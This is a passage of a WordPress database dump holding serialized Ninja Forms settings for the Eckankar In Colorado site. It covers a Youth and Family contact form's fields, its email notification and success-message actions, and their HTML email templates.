left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_278\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_278\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:310;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-09-20 19:37:28\";s:5:\"label\";s:9:\"Save Form\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:133;}i:1;a:2:{s:8:\"settings\";a:27:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2019-09-20 19:37:28\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_270}\";s:13:\"email_subject\";s:38:\"Western Slope Leadership Communication\";s:13:\"email_message\";s:4984:\"<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"bodyTable\"><br /><br />\r\n    <tr><br /><br />\r\n        <td align=\"center\" valign=\"top\"><br /><br />\r\n            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"800\" id=\"emailContainer\"><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"left\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding-left:10px;color:#23507d;line-height: 80%\"><br /><br />\r\n                                    <h1>Eckankar In Colorado</h1> <br /><br />\r\n                                </td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                                <td></td><br /><br />\r\n                                <br /><br />\r\n                                <br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailBody\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\"><br /><br />\r\n                                   <p><strong>Hello {field:textbox_268},</strong><br /><br />\r\n                                  </p><br /><br />\r\n                                  <p>You have created a new form submission on the Eckankar In Colorado website.                                      Your submission is requesting contact with a person on the \"Western Slope Leadership Communication\" team.</p><br /><br />\r\n                              <p>Here is a copy of the information that you have submitted: </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                          <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailHeader\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left<br /><br />\r\n                                \" valign=\"top\" style=\"background-color:#ebebeb;padding:10px;border: 1px solid #cccccc\"><br /><br />\r\n                                    <p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_268}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_269}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_270}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> [ninja_forms_field id=271]</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> [ninja_forms_field id=272]<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> [ninja_forms_field id=275]</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p><br /><br />\r\n                                </td><br /><br />\r\n                            </tr><br /><br />\r\n                        </table><br /><br />\r\n                        <br /><br />\r\n                        <br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n                <tr><br /><br />\r\n                    <td align=\"center\" valign=\"top\"><br /><br />\r\n                        <table border=\"0\" cellpadding=\"8\" cellspacing=\"0\" width=\"100%\" id=\"emailFooter\"><br /><br />\r\n                            <tr><br /><br />\r\n                                <td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n                                  Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color:#23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n  <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><br /><br />\r\n                                </p></td><br /><br />\r\n                            </tr><br /><br />\r\n                            <br /><br />\r\n                            <br /><br />\r\n                        </table><br /><br />\r\n                    </td><br /><br />\r\n                </tr><br /><br />\r\n            </table><br /><br />\r\n        </td><br /><br />\r\n    </tr><br /><br />\r\n</table><br /><br />\r\n\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";}s:2:\"id\";i:134;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-09-20 19:37:28\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:360:\"<div style=\"text-align: center; width: 60%;margin: auto; padding-top: 80px; padding-bottom: 80px\"><span style=\"font-size: 38pt\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span><p> <span style=\"font-size: 18pt\">We appreciate you taking the time to communicate with us. You will be contacted soon regarding your submission.</span></p></div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:135;}i:3;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2019-09-20 19:37:28\";s:5:\"label\";s:11:\"Admin Email\";s:19:\"email_message_plain\";s:0:\"\";s:3:\"tag\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:33:\"Eckankar In Colorado Contact Form\";s:12:\"from_address\";s:29:\"contact@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:13:\"email_message\";s:2697:\"<table id=\"bodyTable\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailContainer\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\"><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" valign=\"top\" align=\"left<br ></td>\n<br />                                \"><h1> Eckankar In Colorado</h1>\n<br></td>\n<td>&nbsp;</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailBody\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n  <td valign=\"top\" align=\"left\"><p><strong><span style=\"font-size: 20px;\">Hello! You have a new \"Youth and Family\" contact form submission.</span><br><br></strong>This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the contact to receive these messages.</p>\n<p>The following person has requested contact. Here is the information that <strong><span style=\"color: #23507D; font-weight:strong;\">{field:textbox_268}</span></strong> has submitted:</p>\n</td>\n</tr>\n</tbody>\n</table>\n<br><table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">\n<tbody>\n<tr>\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left<br ></td>\n<br />                                \"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong>&nbsp; {field:textbox_268}<br></span><span style=\"color: #333333\"><strong>LAST NAME:</strong>&nbsp; {field:lastname_269}</span><span style=\"color: #333333\"><br></span><span style=\"color: #333333\"><strong>EMAIL:</strong>&nbsp; {field:email_270}<br></span><span style=\"color: #333333\"><strong>MESSAGE SUBJECT:</strong>&nbsp; {field:textbox_303}</span><br><span style=\"color: #333333\"><strong>ENTER YOUR MESSAGE: </strong>{field:textarea_276}</span></p>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n<tr>\n<td valign=\"top\" align=\"center\"><table id=\"emailFooter\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\" border=\"0\">\n<tbody>\n<tr>\n<td valign=\"top\" align=\"left\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p>\n<br><br></td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n</td>\n</tr>\n</tbody>\n</table>\n<br>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:136;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:29:\"Youth and Family Contact Form\";s:10:\"created_at\";s:19:\"2019-09-20 19:37:28\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-03-03 03:15:50\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:2:\"36\";s:10:\"conditions\";a:0:{}s:17:\"allow_public_link\";s:1:\"0\";s:10:\"embed_form\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:10:{i:0;s:8:\"html_267\";i:1;s:11:\"textbox_268\";i:2;s:12:\"lastname_269\";i:3;s:9:\"email_270\";i:4;s:6:\"hr_273\";i:5;s:11:\"textbox_303\";i:6;s:12:\"textarea_276\";i:7;s:8:\"html_305\";i:8;s:18:\"html_1663800814752\";i:9;s:10:\"submit_278\";}s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"default_label_pos\";s:5:\"above\";s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(35,'a:7:{s:2:\"id\";i:35;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:9:{i:0;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_268\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_268\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:312;}i:1;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_269\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_269\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:313;}i:2;a:2:{s:8:\"settings\";a:26:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:5:\"Phone\";s:4:\"type\";s:5:\"phone\";s:3:\"key\";s:19:\"phone_1599585699152\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";i:1;s:7:\"default\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:13:\"element_class\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:10:\"characters\";s:15:\"input_limit_msg\";s:17:\"Character(s) left\";s:10:\"manual_key\";b:0;s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"333\";}i:3;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_270\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_270\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:314;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:15:\"Message Subject\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:11:\"placeholder\";s:0:\"\";s:10:\"first_name\";s:0:\"\";s:9:\"last_name\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:21:\"user_info_field_group\";s:1:\"1\";s:13:\"disable_input\";s:1:\"0\";s:4:\"mask\";s:0:\"\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"datepicker\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_303\";s:11:\"field_label\";s:15:\"Message Subject\";s:9:\"field_key\";s:11:\"textbox_303\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:315;}i:5;a:2:{s:8:\"settings\";a:36:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:30:\"Please Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:44:\"please_enter_your_message_here_1599585729237\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:12:\"textarea_276\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:316;}i:6;a:2:{s:8:\"settings\";a:22:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:147:\"Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:178:\"<div align=\"left\"><b>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.</b></div>\";s:3:\"key\";s:8:\"html_305\";s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_305\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:317;}i:7;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797829803\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"623\";}i:8;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) 